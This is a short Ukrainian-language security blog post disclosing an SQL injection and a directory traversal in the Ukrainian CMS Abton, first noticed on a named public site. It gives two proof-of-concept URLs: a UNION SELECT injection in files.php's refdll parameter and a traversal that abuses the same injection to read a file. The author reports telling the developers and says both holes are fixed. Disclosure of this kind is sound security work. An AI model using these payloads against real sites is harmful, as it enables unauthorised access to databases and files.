Нові уразливості в Abton

19:17 19.02.2010

23.10.2009

У лютому, 17.02.2009, я знайшов SQL Injection та Directory Traversal уразливості в системі Abton. Це українська CMS. Дірку виявив на http://uareferat.com, де використовується даний движок.

Раніше я вже писав про уразливості в Abton.

Детальна інформація про уразливість з’явиться пізніше. Спочатку повідомлю розробникам системи.

19.02.2010

SQL Injection:

http://site/files.php?refdll=-1+union+select+version()%23

Про дану SQL Injection мені повідомив Alex в коментарях під час обговорення попередніх дірок на uareferat.com. Також я виявив, що через цю уразливість можна проводити Directory Traversal атаки.

Directory Traversal (через SQL Injection):

http://site/files.php?refdll=-1+union+select+’../file.php’%23

Дані уразливості вже виправлені (в движку і на сайті uareferat.com).


Leave a Reply

You must be logged in to post a comment.